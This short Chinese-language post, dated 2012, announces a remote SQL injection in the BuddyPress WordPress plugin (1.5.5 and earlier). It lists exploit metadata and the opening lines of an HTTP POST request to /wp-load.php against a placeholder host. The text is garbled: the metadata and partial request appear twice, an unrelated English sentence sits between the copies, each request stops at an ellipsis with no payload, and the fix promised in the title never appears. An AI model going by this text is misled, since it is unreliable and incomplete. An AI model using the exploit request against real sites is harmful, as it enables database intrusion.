2012 年 4 月 7 日
WordPress插件Buddypress远程SQL注射及修复
作者: Ivan Terkin
类型: Remote Exploit
漏洞: Remote SQL Injection
软件下载地址: buddypress.org
影响版本: 1.5.5及以下
测试平台: Buddypress 1.5.4
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: www.xxxx.com
…
each stage has something to do in each stage, take every step well.
作者: Ivan Terkin
类型: Remote Exploit
漏洞: Remote SQL Injection
软件下载地址: buddypress.org
影响版本: 1.5.5及以下
测试平台: Buddypress 1.5.4
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: www.xxxx.com
…